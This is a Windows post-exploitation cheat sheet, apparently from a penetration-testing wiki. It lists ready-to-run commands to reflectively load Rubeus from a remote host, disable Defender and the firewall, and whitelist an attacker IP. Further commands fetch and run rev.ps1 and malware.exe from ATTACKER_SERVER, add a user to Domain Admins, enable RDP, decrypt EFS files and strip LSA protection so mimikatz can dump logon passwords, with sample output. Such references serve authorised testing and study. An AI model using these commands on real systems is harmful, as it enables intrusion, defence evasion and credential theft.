Miscellaneous

Reflective Loading

https://twitter.com/alh4zr3d/status/1588178898210017280?s=46&t=3M009y9X9MgpQbkce8qjmw

$d = (New-Object http://System.Net.WebClient).DownloadData('http://<ip>/Rubeus.exe')
$a = [System.Reflection.Assembly]::Load($d)
[Rubeus.Program]::Main("triage".Split())

Windows Defender

# Disable service
sc.exe stop WinDefend

# Disable runtime
Set-MpPreference -DisableRealtimeMonitoring $true

# Remove definitions
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Firewall

Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off

Ip Whitelisting

New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP

Changing Permissions of a file

icacls text.txt /grant Everyone:F

Downloading files

IEX (New-Object System.Net.WebClient).DownloadString("http://ATTACKER_IP/rev.ps1")
(New-Object System.Net.WebClient).DownloadFile("http://ATTACKER_SERVER/malware.exe", "C:\Windows\Temp\malware.exe")  
Invoke-WebRequest "http://ATTACKER_SERVER/malware.exe" -OutFile "C:\Windows\Temp\malware.exe"  

certutil.exe -urlcache -split -f "http://127.0.0.1:80/shell.exe" shell.exe

Adding user to Domain admins

Add-DomainGroupMember -Identity 'Domain Admins' -Members morph3 -Verbose

Base64 Encode-Decode

certutil -decode foo.b64 foo.exe
certutil -encode foo.exe foo.b64

Local share

net share
wmic share get /format:list

Remote share

net view
net view \\dc.ecorp.foo /all
wmic /node: dc.ecorp.foo share get

Mounting shares

net use Z: \\127.0.0.1\C$ /user:morph3 password123

Hosting a local smbserver

impacket-smbserver -smb2support morph3-share .

Port Forwarding

# Port forward using plink
plink.exe -l morph3 -pw pass123 192.168.1.56 -R 8080:127.0.0.1:8080

# Port forward using meterpreter
portfwd add -l attacker-port -p victim-port -r victim-ip
portfwd add -l 3306 -p 3306 -r 192.168.1.56

Powershell Portscan

0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(VICTIM_IP,$_)) "Port $_ is open!"} 2>$null

Recovering Powershell Secure String

######
$user = "morph3"
$file = "morph3-pass.xml"
$cred= New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, (Get-Content $file | ConvertTo-SecureString)
Invoke-Command -ComputerName ECORP -Credential $cred -Authentication credssp -ScriptBlock { whoami }

######
[System.Runtime.InteropServices.marshal]::PtrToStringAuto([System.Runtime.InteropServices.marshal]::SecureStringToBSTR("string"))

######
$Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($password)
$result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr)
[System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr)
$result

Injecting PowerShell scripts Into sessions

Invoke-Command -FilePath scriptname -Sessions $sessions
Enter-PSSession -Session $sess

Enable RDP

In cmd.exe,

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

In powershell,

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

net localgroup "Remote Desktop Users" morph3 /add

# Reruling firewall
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow

Decrypting EFS files with Mimikatz

Follow the link here How to Decrypt EFS Files

privilege::debug 
token::elevate 
crypto::system /file:"C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\thecert" /export

dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\SID\id"

# Clear text password 
dpapi::masterkey /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\SID\masterkey" /password:pass123

# After this command you must have the exported .der and .pvk files
dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\SID\id" /masterkey:f2c9ea33a990c865e985c496fb8915445895d80b

openssl x509 -inform DER -outform PEM -in blah.der -out public.pem

openssl rsa -inform PVK -outform PEM -in blah.pvk -out private.pem

openssl pkcs12 -in public.pem -inkey private.pem -password pass:randompass -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

# Import the certificate
certutil -user -p randompass -importpfx cert.pfx NoChain,NoRoot

type "C:\Users\Administrator\Documents\encrypted.txt"

Patching LSA

https://itm4n.github.io/lsass-runasppl/

Check if LSA Protection is enabled,

reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL

Upload mimikatz and mimidrv.sys and patch it using

!+
!processprotect /process:lsass.exe /remove

c:\Users\administrator\Desktop>.\mimikatz_x64.exe
.\mimikatz_x64.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service started

mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

ERROR mimikatz_doLocal ; "" command of "standard" module not found !

mimikatz # !processprotect /process:lsass.exe /remove
Process : lsass.exe
PID 672 -> 00/00 [0-0-0]

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; ...
Session           : Interactive from 0
User Name         : Administrator

...

PreviousPost Exploitation NextUAC Bypass

Last updated 3 years ago

hashtagReflective Loading

hashtagWindows Defender

hashtagFirewall

hashtagIp Whitelisting

hashtagChanging Permissions of a file

hashtagDownloading files

hashtagAdding user to Domain admins

hashtagBase64 Encode-Decode

hashtagNetwork sharing

hashtagPort Forwarding

hashtagPowershell Portscan

hashtagRecovering Powershell Secure String

hashtagInjecting PowerShell scripts Into sessions

hashtagEnable RDP

hashtagDecrypting EFS files with Mimikatz

hashtagPatching LSA

Reflective Loading

Windows Defender

Firewall

Ip Whitelisting

Changing Permissions of a file

Downloading files

Adding user to Domain admins

Base64 Encode-Decode

Network sharing

Port Forwarding

Powershell Portscan

Recovering Powershell Secure String

Injecting PowerShell scripts Into sessions

Enable RDP

Decrypting EFS files with Mimikatz

Patching LSA